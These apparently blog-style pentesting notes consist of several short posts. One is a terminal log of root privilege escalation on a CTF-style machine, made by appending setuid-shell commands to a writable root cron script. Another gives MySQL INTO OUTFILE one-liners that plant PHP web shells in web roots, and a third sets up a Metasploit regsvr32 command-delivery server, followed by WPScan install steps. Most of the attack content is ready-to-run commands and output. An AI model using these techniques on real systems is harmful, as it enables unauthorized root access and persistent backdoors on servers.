Tuesday, May 25, 2021

Crontab priv esca

 www-data@red:/etc$ ls -la cron*
ls -la cron*
-rw-r--r-- 1 root root  722 Apr  5  2016 crontab

cron.d:
total 32
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Jun  3  2016 .placeholder
-rw-r--r--   1 root root    56 Jun  3  2016 logrotate
-rw-r--r--   1 root root   589 Jul 16  2014 mdadm
-rw-r--r--   1 root root   670 Mar  1  2016 php

cron.daily:
total 56
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root   539 Apr  5  2016 apache2
-rwxr-xr-x   1 root root   376 Mar 31  2016 apport
-rwxr-xr-x   1 root root   920 Apr  5  2016 apt-compat
-rwxr-xr-x   1 root root  1597 Nov 26  2015 dpkg
-rwxr-xr-x   1 root root   372 May  6  2015 logrotate
-rwxr-xr-x   1 root root   539 Jul 16  2014 mdadm
-rwxr-xr-x   1 root root   249 Nov 12  2015 passwd
-rwxr-xr-x   1 root root   383 Mar  8  2016 samba
-rwxr-xr-x   1 root root   214 Apr 12  2016 update-notifier-common

cron.hourly:
total 20
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder

cron.monthly:
total 20
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder

cron.weekly:
total 28
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root    86 Apr 13  2016 fstrim
-rwxr-xr-x   1 root root   211 Apr 12  2016 update-notifier-common
www-data@red:/etc$ cd cron.d    
cd cron.d
www-data@red:/etc/cron.d$ ls
ls
logrotate  mdadm  php
www-data@red:/etc/cron.d$ ls -la
ls -la
total 32
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Jun  3  2016 .placeholder
-rw-r--r--   1 root root    56 Jun  3  2016 logrotate
-rw-r--r--   1 root root   589 Jul 16  2014 mdadm
-rw-r--r--   1 root root   670 Mar  1  2016 php
www-data@red:/etc/cron.d$ cd logrotate
cd logrotate
bash: cd: logrotate: Not a directory
www-data@red:/etc/cron.d$ cat logrotate
cat logrotate
*/5 *   * * *   root  /usr/local/sbin/cron-logrotate.sh
www-data@red:/etc/cron.d$ cat /usr/local/sbin/cron-logrotate.sh
cat /usr/local/sbin/cron-logrotate.sh
#Simon, you really need to-do something about this
www-data@red:/etc/cron.d$ cd ..
cd ..
www-data@red:/etc$ echo "cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit;chmod root:root /tmp/exploit">> /usr/local/sbin/cron-logrotate.sh
<d root:root /tmp/exploit">> /usr/local/sbin/cron-logrotate.sh               
www-data@red:/etc$ cat /usr/local/sbin/cron-logrotate.sh
cat /usr/local/sbin/cron-logrotate.sh
#Simon, you really need to-do something about this
cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit;chmod root:root /tmp/exploit
www-data@red:/etc$ cd
cd
bash: cd: HOME not set
www-data@red:/etc$ cd ..
cd ..
www-data@red:/$ /tmp/exploit -p
/tmp/exploit -p
# cd /root
cd /root
# ls
ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql

at No comments:

mysql priv escalation

 For window >>>

SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
 For Linux 
Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";



msf6 > search regsvr32

Matching Modules
================

   #  Name                                               Disclosure Date  Rank    Check  Description
   -  ----                                               ---------------  ----    -----  -----------
   0  auxiliary/server/regsvr32_command_delivery_server                   normal  No     Regsvr32.exe (.sct) Command Delivery Server
   1  exploit/multi/script/web_delivery                  2013-07-19       manual  No     Script Web Delivery


Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/script/web_delivery

msf6 > use 0
msf6 auxiliary(server/regsvr32_command_delivery_server) > show options

Module options (auxiliary/server/regsvr32_command_delivery_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD                       no        The command to execute
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

msf6 auxiliary(server/regsvr32_command_delivery_server) > set SRVHOST 192.168.1.5
SRVHOST => 192.168.1.5
msf6 auxiliary(server/regsvr32_command_delivery_server) > set SRVPORT 4444
SRVPORT => 4444

at No comments:

installlation of wpscan

  1) To install ruby, type : sudo apt install ruby 

 2) To install dependencies for building extensions, type: sudo apt install build-essential libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev libgmp-dev zlib1g-dev 

3) To install WPScan, type: sudo gem install wpscan

at No comments:
Subscribe to: Comments (Atom)